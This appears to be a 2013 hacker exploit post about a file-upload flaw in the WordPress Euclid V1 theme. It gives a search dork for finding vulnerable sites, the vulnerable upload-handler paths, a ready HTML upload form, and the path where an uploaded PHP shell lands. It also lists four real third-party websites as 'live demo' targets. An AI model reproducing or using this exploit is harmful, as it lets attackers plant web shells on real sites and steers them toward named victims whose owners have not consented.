WordPress Euclid V1 Themes CSRF File Upload Vulnerability

#Title : WordPress Euclid V1 Themes CSRF File Upload Vulnerability
#Author : DevilScreaM
#Date : 11/17/2013 – 17 November 2013
#Category : Web Applications
#Type : PHP
#Version : 1.x.x
#Vendor : http://freelancewp.com
#Download : http://freelancewp.com/wordpress-theme/euclid/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:wp-content/themes/euclid_v1

CSRF File Upload Vulnerability

Exploit & POC :

http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php

Script :
<form enctype=”multipart/form-data”
action=”http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php” method=”post”>
Your File: <input name=”uploadfile” type=”file” /><br />
<input type=”submit” value=”upload” />
</form>

File Access :
http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

Live Demo :

http://rapidmaintenanceuk.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php
http://cbaydeluxeresort.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php
http://abovethemoon.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php
http://education-maroc.com/wp-content/themes/euclid_v1.0.1/functions/upload-handler.php

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: Root Google